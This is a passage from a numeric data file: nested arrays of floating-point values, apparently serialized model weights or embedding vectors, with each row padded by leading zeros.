0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1842, 0.0344, -0.1151, 0.1847, -0.1372, -0.1893, -0.7485, 0.5757, -0.01331, 0.1437, 0.133, -0.2244, 0.3022, 0.04086, -0.3396, 0.06494, 0.0732, -0.4592, 0.4749, 0.3772, -1.114, -0.572, 0.04993, -0.2542, -0.02524, 0.2257, 0.1499, -0.1552, -0.0172, 0.9907, 0.07837, -0.1442, -0.1791, -0.34, 0.2123, 0.008255, 0.0684, 0.588, -0.1707, -0.5435, 0.11896, -0.4958, -1.667, -0.324, -0.01543, 0.5103, 0.0941, 0.3374, 0.3958, -0.2235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01717, -0.0345, -0.00869, 0.03818, 0.02141, 0.04218, 0.02155, -0.03363, -0.04742, 0.02135, 0.00994, 0.02777, 0.00493, -0.04272, -0.024, -0.03223, 0.0134, -0.04236, -0.0401, -0.01746, -0.0423, 0.014656, -0.03137, 0.03848, 0.04642, 0.02182, 0.01596, 0.004173, 0.0174, -0.01785, -0.0479, -0.004086, -0.04184, 0.001454, -0.05087, -0.04633, 0.02142, -0.05328, -0.0573, 0.02898, -0.03293, -0.03198, -0.0334, -0.0227, -0.01547, -0.0484, -0.007114, -0.0371, 0.01964, -0.0352], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0698, -0.00409, -0.278, 0.2588, 0.1558, -1.331, -1.312, -0.893, 0.1954, 0.384, 0.04272, -0.5396, 0.0813, 0.4014, -0.2744, 0.368, -0.7607, -1.294, 1.471, 0.0978, -0.79, -0.5347, 0.007206, -0.5537, -0.02199, 0.2654, 0.204, 0.4092, -0.8594, 0.1875, 0.2424, -0.11285, 0.5264, -0.4639, -0.3643, 0.05368, 0.4436, 0.9194, 0.64, -0.879, -0.9785, -0.03918, 0.1421, -0.7983, -1.767, 0.153, 0.261, -1.877, -0.5923, 0.4407], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.795, -0.363, -0.1719, 0.0976, 0.02715, -0.4153, -0.09247, -0.6025, -0.321, 0.4353, 0.528, -0.4155, -0.1958, -0.03726, -1.008, 0.1334, 0.2484, -1.698, 2.012, -0.707, 1.155, 0.527, -0.1694, 0.3635, -0.03018, 0.7705, -0.3774, -0.013725, -0.4878, 0.2263, 0.3835, 0.282, -0.4768, 0.00903, -0.10144, -0.621, 0.004456, -0.1442, -0.1324, 0.3567, 0.05804, -0.4553, -0.707, -0.4053, -0.0423, 0.5967, -0.2177, -0.1289, -0.1266, -0.1729], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0585, 0.007084, 0.268, -0.006596, 0.316, -0.05377, 0.3657, 0.03604, -0.04745, -0.3713, 0.1539, -0.2157, 0.1462, 0.4146, -0.05222, -0.12213, -0.2384, -1.1, -3.205, -0.439, -0.2605, -0.2693, -0.04092, 0.3691, -0.04352, -0.3445, -0.371, -0.369, -0.03485, 0.3838, -0.104, -0.346, 0.5254, 0.1403, 0.1561, 0.573, -0.01642, -0.1343, -0.1335, 0.009895, -0.218, -0.1565, -0.6396, 0.6675, 0.415, 0.324, -0.066, 0.859, -0.6196, -0.01118], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.03326, -0.08105, -0.534, 0.668, -0.8125, 1.297, 1.269, 0.7046, 0.1178, 0.03143, 0.346, -1.276, 0.2593, 0.756, 0.559, -0.1236, -0.317, -1.39, -2.33, 0.6846, 0.0419, -0.6416, -0.02202, -0.815, 0.03625, -0.3328, -0.1742, -0.664, 0.2155, 0.4146, -0.3162, 0.411, 0.6562, 1.717, -0.3503, 0.07434, 0.3743, 0.2393, 1.45, -0.3213, 0.2451, -0.718, -1.787, 1.142, 0.2827, 0.795, -0.2998, -0.773, -0.0412, 0.82], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2083, 0.835, -0.1512, 1.151, 0.2216, 0.1082, 0.0651, 0.1455, 0.632, 0.1089, 0.5083, -0.269, -0.1982, 0.1724, 0.326, 0.06128, -0.6353, -0.4355, 0.591, 0.09235, -0.00991, -0.2275, -0.391, 0.04318, -0.04575, 0.2002, 0.1274, -0.327, 0.5947, -0.4128, 0.1785, 0.005787, -0.661, 0.01032, -0.11035, 0.542, 0.1589, 0.4666, -0.2703, -0.2239, -0.03134, -0.2382, -0.4, 0.729, 0.10986, -0.519, 0.2805, 0.3657, 1.363, -0.1381], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.105, 0.2788, -1.35, -0.0696, 0.755, 2.578, 0.08655, 0.511, -0.05777, -0.10406, -0.4238, -0.2139, 0.02632, 3.168, 0.7056, 0.1565, 0.1157, 0.8896, 0.04855, -0.3293, -7.395, -0.588, 0.6797, 0.404, 0.03534, -1.802, -0.3958, 0.1975, -0.2886, -0.8306, 0.318, -0.818, -0.743, 0.3684, 0.02339, 0.4077, -1.042, 0.484, 0.0829, 0.3572, -1.502, -0.1963, 0.7256, 0.2228, 0.034, -0.584, 0.09314, 0.3281, 0.823, 0.05106], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.01807, -0.121, -0.1934, 0.858, -1.76, -0.1458, 2.568, 0.7827, 0.4504, -0.09827, -0.1247, -0.7266, -0.7324, 0.1536, -0.03268, 0.086, -0.57, 0.394, 0.11743, 0.2512, 0.8457, 0.8477, 0.4211, 0.573, 0.0251, -0.1708, -0.1277, 0.008316, 0.0788, 2.576, -1.3, 0.691, -3.324, -1.357, -2.201, 0.3928, 0.373, 0.2803, -0.61, 0.1031, -0.2776, 1.429, 0.4731, -0.674, 1.211, -1.3545, 0.102, -1.702, 1.088, -0.8125], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2346, -0.00865, 0.0404, 0.2515, 0.656, -0.1879, -0.628, 0.518, -0.3967, -0.7896, 0.1755, -0.392, 0.2778, -1.058, 0.526, 0.5107, -0.106, -1.676, 1.808, -0.234, 0.7017, -0.5415, 0.106, -0.1678, -0.02924, 1.149, -0.1597, -0.2277, -0.1355, 1.564, 0.781, -0.7246, -0.5938, -0.999, 0.092, 0.4507, -0.539, 0.548, -0.3132, -0.10474, 0.4106, 0.7515, 0.4949, -0.8584, -0.239, -0.2393, 0.4236, -0.274, 0.2233, -0.13], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00583, 0.01645, -0.04987, -0.05817, 0.02448, 0.0158, -0.03558, 0.003952, -0.02164, 0.0113, 0.010056, -0.0641, 0.02402, 0.00583, -0.03516, 0.01378, -0.04208, -0.0349, -0.0375, -0.02574, -0.0547, -0.03586, 0.002085, -0.03635, 0.0248, 0.0335, 0.02165, 0.01984, -0.04718, -0.00706, -0.00931, -0.04944, -0.06186, 0.03001, -0.03009, 0.01391, -0.04825, -0.004513, -0.01894, 0.04022, 0.01819, 0.0376, -0.02705, 0.03372, -0.01982, -0.01659, 0.02092, -0.04224, -0.02606, -0.02498], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.28, 0.3777, -0.442, -1.278, -0.298, 1.281, -0.5425, -0.3464, 0.276, 0.5254, -0.2957, -0.5825, 0.1661, 0.1626, 0.3904, 0.1613, 0.04514, -0.1263, -1.202, 0.563, 0.4102, -1.772, -0.2196, -0.1243, 0.004547, 0.1006, -0.521, 0.0338, -0.2922, 0.1674, -0.3396, 0.423, 1.013, 0.7837, -0.3315, -0.6333, 0.0739, 0.9526, 0.2418, -0.2773, 0.4539, -0.0781, 0.4905, -0.1461, -0.8364, -0.8, -0.04453, -0.05927, -0.5234, 0.5137], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.10876, -0.02428, 0.4392, 0.6504, 0.1965, -0.8384, 0.1214, 1.17, 0.2328, 0.3047, -0.536, -1.065, 0.8696, 0.496, 0.1542, 0.05777, 0.089, 0.4883, -0.7075, -0.08936, -4.562, 0.1741, -0.211, -0.4795, -0.00846, 1.237, 0.291, 0.05136, 0.3975, 0.2632, -0.8623, -0.06082, 0.5806, 0.3206, -0.7837, 0.3662, -0.02449, -0.0982, 0.5747, -0.5967, 0.5894, -0.7046, -0.561, -0.084, 0.0148, 0.1432, -0.1126, 0.11566, 0.02419, 0.00782], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.08765, 0.6006, -0.3933, 1.051, 0.26, -0.1387, 0.319, -0.597, -0.7056, 0.6167, -4.617, 0.2725, 0.432, -0.1575, -0.3286, 0.519, -0.874, -0.0952, 1.0, -0.2961, -0.1764, -0.2441, 0.4016, -0.95, 0.0174, -1.438, 1.338, 0.1537, -0.458, 0.9473, -1.316, 0.2795, -0.774, 0.8223, -1.338, -0.5674, 0.4534, 0.2507, 0.4292, 0.2234, 1.011, -0.9844, 0.2317, 0.1796, -0.3079, 0.4976, 0.384, -0.143, -0.4805, -1.605], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.262, 0.661, -0.4253, 0.989, -0.2634, -0.08545, 0.727, 0.0519, -0.0411, 1.034, 2.947, -0.603, 0.6646, 1.787, -1.78, 0.4426, -0.1941, 0.6216, 0.3884, -0.02223, 0.04642, 0.7266, 0.4312, -1.126, -0.0164, -0.4316, -0.714, 0.769, -0.18, 2.375, -1.707, 0.4666, 0.957, 1.544, -1.453, -0.7217, 0.3167, -0.6045, 1.53, -0.5034, -0.10425, 0.715, 0.4912, 0.015045, 0.1528, 0.1638, 0.666, -1.191, -0.536, -0.653], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.668, -0.02022, -0.4302, -0.5986, 0.3535, -0.4646, -0.12006, -0.0442, 0.1613, 1.195, 0.1637, 0.2397, 0.4604, 1.543, 0.5903, 0.553, 0.03336, 1.096, -0.1825, 0.174, -2.191, 0.2266, 0.2625, 0.9956, 0.04175, 0.5254, -0.4443, -0.2927, -0.1973, -0.461, -0.4521, -0.2612, 0.2263, -0.2479, -0.1584, 0.3867, -1.021, 0.2477, 0.2612, 0.2678, -0.367, -0.302, -1.061, 0.2556, 0.148, -0.01314, 0.2164, 0.664, 0.6475, -0.0201], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.522, -0.3928, 0.2905, -0.1028, 0.713, -2.283, 1.424, 0.4412, 0.297, -0.1198, -0.6753, 0.1329, 0.1436, -0.00591, 0.3198, 0.629, 0.5044, 0.807, -1.695, -2.906, 0.05045, 0.6626, -0.8228, 0.3096, 0.04413, 0.703, 0.1733, -0.07324, 1.279, 0.1576, 0.003918, 0.2429, -0.1642, -1.0205, -0.05414, -2.398, 0.0938, -0.2756, -0.4885, 1.018, -0.3225, -0.432, -0.545, -1.186, -0.6465, -0.353, 1.0, 0.7026, 0.4104, 0.06146], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.296, 0.4875, -0.2507, -0.7974, -0.2324, 0.4185, 0.3872, 0.96, -0.1919, 1.045, -0.652, -0.2798, 0.7163, 0.3423, 0.8296, 0.1484, -0.11316, -0.447, -0.3013, 0.1136, -0.0545, -0.2625, -1.231, 0.1847, -0.04263, 1.192, -0.4333, 0.07574, 0.665, -0.398, 0.2374, -0.4692, -0.626, 0.142, -0.1678, 0.2754, -0.7583, 0.5093, -0.2183, -0.663, -0.0596, -0.02704, 0.525, -0.232, -0.0003896, 0.1353, -0.462, 0.999, -0.3032, 0.02649], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.05978, -0.1815, 0.2344, 1.165, 0.09717, 0.214, 0.21, 0.3296, -0.6685, 0.2937, -0.989, -0.289, 0.1522, -0.328, -1.0, 0.006508, 0.541, 0.4094, -1.003, -0.669, -0.066, 0.3145, -0.3557, -0.05087, 0.03793, 0.501, -0.1107, 0.474, 0.1442, -0.6875, -0.477, 0.4353, 0.572, 1.826, -0.93, -0.11835, -0.3499, 0.1942, 1.55, 0.02454, -0.1842, 0.2932, -0.0971, -0.0633, 0.2274, 0.8726, -0.601, -0.985, -0.616, -0.7305], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2256, -0.1345, 2.604, -0.2798, -0.03268, 2.945, -0.38, 1.067, 0.257, -0.2461, 0.00626, 1.004, 0.4443, 1.989, 0.4568, 0.1012, 0.2913, 0.4824, 0.06287, -0.635, -0.8574, 0.03464, -0.6562, -0.1549, 0.0263, -0.08386, 0.3125, -0.4038, 0.1927, 1.177, -0.4463, 1.141, -0.4224, 0.4417, -0.175, 0.2375, 0.3623, -1.084, 0.7915, -0.2886, 0.1523, 0.1656, -5.586, -0.2922, -0.61, 0.003597, 0.0598, 0.3374, -0.04562, -0.05157], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0766, 0.121, 0.1593, -0.3765, -0.0741, -0.827, -0.5776, -0.3413, 0.2026, 0.2094, 0.0714, 0.2212, 0.2676, -0.277, -0.0728, -0.1219, 0.3801, 0.6875, -0.8516, 0.1486, 0.243, -0.1863, -0.2688, 0.1377, -0.011284, -0.2915, -0.0438, -0.1384, 0.3477, 0.00719, -0.3423, -0.678, -0.8105, 0.2247, 0.2837, 0.2408, 0.3687, 0.1667, -0.5845, -0.1186, -0.5503, 0.2137, 0.406, 0.634, 0.03757, -0.2147, -0.4487, 0.853, 0.3682, -0.235], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.005344, -0.005375, -0.1844, -0.1422, -0.4163, 0.363, 0.3452, 0.2961, -0.12463, 0.322, -0.2354, -0.0981, 0.4094, -0.04977, -0.3755, -0.251, -0.09814, 0.07227, 0.54, 0.267, 0.3186, 0.3896, -0.00588, -0.5376, 0.0225, 0.1459, 0.456, 0.4353, -0.4207, -0.9043, -0.137, -0.532, 0.09033, -0.1045, 0.0679, -0.05405, -0.54, 0.518, -0.004795, -0.007996, 0.467, 0.001567, 0.3496, -0.1802, -0.2964, -0.424, 0.6357, -0.6045, 0.2097, -0.3027], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3167, 0.9414, 0.3423, -0.7285, 1.447, 1.598, 0.3784, -2.488, 1.754, 1.641, 0.6514, 0.896, 1.061, 0.333, -0.39, -1.518, 0.1954, 0.0682, 0.5723, 0.3572, -0.1768, -0.06186, -0.5127, -1.006, -0.01735, 0.794, 1.578, 0.706, -1.055, 1.966, 0.02258, 0.3064, -0.39, 0.06134, -0.1232, 0.2015, -0.514, 0.3577, -1.04, -2.53, -0.826, -0.1962, 1.855, 0.2438, -0.837, -1.631, 0.527, -1.883, 0.9663, -0.6304], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3176, -0.3198, -0.7114, 1.592, 0.08417, 1.879, 1.01, 0.7896, 0.5034, 0.549, 0.6157, 0.3955, -0.6978, -0.268, -2.107, 0.02959, 0.1395, -0.502, 5.973, -0.0728, 0.3342, 0.2527, -0.2776, -0.274, -0.0214, 0.5806, -0.842, -0.02933, 0.07776, -1.387, -2.268, 0.87, 0.9795, 0.852, -0.751, -1.045, 0.183, -0.06726, 1.709, -0.0696, 0.6284, -0.653, -1.73, -0.9546, -0.05615, 0.879, 0.635, -1.523, 0.625, -0.08105], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.03867, 0.03003, -0.04062, 0.01067, -0.0154, 0.04422, 0.01979, -0.010445, -0.02956, -0.000415, -0.01141, -0.03397, 0.009674, 0.02197, -0.0583, 0.02272, 0.01645, -0.02881, -0.02467, 0.03004, 0.01949, -0.002428, -0.0389, -0.0477, 0.03001, -0.0142, -0.001708, 0.03372, -0.005344, -0.03992, -0.02095, -0.0419, 0.02359, -0.01605, -0.01071, 0.001165, -0.01929, -0.0133, 0.02905, 0.0238, 0.02519, -0.00846, -0.03903, -0.04944, -0.03082, -0.02647, -0.01192, -0.0405, 0.003494, -0.0002534], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04425, -0.0224, 0.03955, 0.02815, 0.00757, 0.01487, 0.03827, -0.02411, 0.01363, 0.02698, 0.03967, -0.02367, -0.02393, 0.0401, -0.05368, 0.01642, -0.03897, 0.03116, 0.00924, -0.01695, -0.0214, -0.03424, -0.03897, -0.02284, 0.001491, -0.04602, -0.04196, -0.02809, 0.02719, -0.0504, -0.05038, -0.02753, 0.02359, -0.003052, 0.02232, -0.0285, -0.05368, 0.00979, 0.0401, -0.02185, 0.03107, -0.009415, 0.02, -0.0312, -0.01549, -0.02383, 0.03888, -0.00915, -0.05057, -0.02075], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06174, 0.1968, 0.776, -0.5483, 0.7134, -0.944, -0.826, 1.354, -0.3923, -0.3738, 0.391, 1.711, 0.1772, 0.11127, -0.2966, 0.4084, -0.55, -0.5063, -0.698, -0.9204, -0.804, 0.3472, 0.4927, -0.3906, 0.02034, 1.919, 1.705, -2.441, 0.3264, 2.379, -0.927, 0.274, -0.0614, -0.175, -0.3877, 0.01239, 1.69, -0.551, 0.2527, 0.1942, -1.712, -2.076, -2.51, -0.637, 0.384, -1.568, -0.4314, 1.49, 1.46, 0.2883], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.06946, 0.2343, -0.03845, 1.886, 0.0264, -0.1407, -0.2942, 0.65, 0.1871, 1.053, 